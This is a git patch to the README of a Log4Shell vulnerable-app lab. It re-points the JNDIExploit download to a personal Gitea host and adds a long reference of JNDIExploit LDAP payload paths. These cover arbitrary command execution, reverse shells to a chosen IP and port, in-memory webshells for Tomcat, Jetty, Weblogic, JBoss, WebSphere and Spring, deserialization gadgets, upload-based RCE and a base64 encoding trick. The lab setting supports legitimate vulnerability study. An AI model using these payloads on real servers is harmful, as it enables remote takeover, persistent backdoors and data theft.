From 42b1785385a04f28b3dc257187a1abefea4c72ad Mon Sep 17 00:00:00 2001 From: borekon Date: Mon, 12 Jun 2023 15:14:16 +0000 Subject: [PATCH] Actualizar 'README.md' --- README.md | 57 +++++++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 55 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e2b60d1..fda0f0b 100644 --- a/README.md +++ b/README.md @@ -19,9 +19,9 @@ docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shel *Note: This is highly inspired from the original [LunaSec advisory](https://www.lunasec.io/docs/blog/log4j-zero-day/). **Run at your own risk, preferably in a VM in a sandbox environment**.* **Update (Dec 13th)**: *The JNDIExploit repository has been removed from GitHub (presumably, [not by GitHub](https://twitter.com/_mph4/status/1470343429599211528))... -[Click Here](http://web.archive.org/web/20211211031401/https://objects.githubusercontent.com/github-production-release-asset-2e65be/314785055/a6f05000-9563-11eb-9a61-aa85eca37c76?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211211%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20211211T031401Z&X-Amz-Expires=300&X-Amz-Signature=140e57e1827c6f42275aa5cb706fdff6dc6a02f69ef41e73769ea749db582ce0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=314785055&response-content-disposition=attachment%3B%20filename%3DJNDIExploit.v1.2.zip&response-content-type=application%2Foctet-stream) to Download the version cached by the Wayback Machine.* +[Click Here](https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip) to Download it -* Use [JNDIExploit](https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) to spin up a malicious LDAP server +* Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server ```bash wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip @@ -61,6 +61,59 @@ pwned ... ``` +## Supported LDAP queries + +All words are **case INSENSITIVE** when send to ldap server +``` +[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g. + ldap://127.0.0.1:1389/Basic/Dnslog/[domain] + ldap://127.0.0.1:1389/Basic/Command/[cmd] + ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/Basic/TomcatMemshell + ldap://127.0.0.1:1389/Basic/JettyMemshell + ldap://127.0.0.1:1389/Basic/WeblogicMemshell + ldap://127.0.0.1:1389/Basic/JBossMemshell + ldap://127.0.0.1:1389/Basic/WebsphereMemshell + ldap://127.0.0.1:1389/Basic/SpringMemshell + +[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialize/[GadgetType]/[PayloadType]/[Params], e.g. + ldap://127.0.0.1:1389/Deserialize/URLDNS/[domain] + ldap://127.0.0.1:1389/Deserialize/CommonsCollections1/Dnslog/[domain] + ldap://127.0.0.1:1389/Deserialize/CommonsCollections2/Command/[cmd] + ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils1/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/Deserialize/C3P0/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/Deserialize/Jre8u20/TomcatMemshell ---ALSO support other memshells + +[+] TomcatBypass Queries + ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain] + ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd] + ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell + ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell + +[+] GroovyBypass Queries + ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd] + ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd] + +[+] WebsphereBypass Queries + ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory] + ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain] + ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd] + ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd] + ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported + ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell + ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp +``` +### base64 trick + +You can convert from a command to base64 with this [online web](https://www.base64encode.org/) + +**Note** that the `+`sign must be encoded has %2B. The following chart shows more posibilities: +![image](https://svbtleusercontent.com/nnlmc8unyj0ibg_small.png) + + ## Reference https://www.lunasec.io/docs/blog/log4j-zero-day/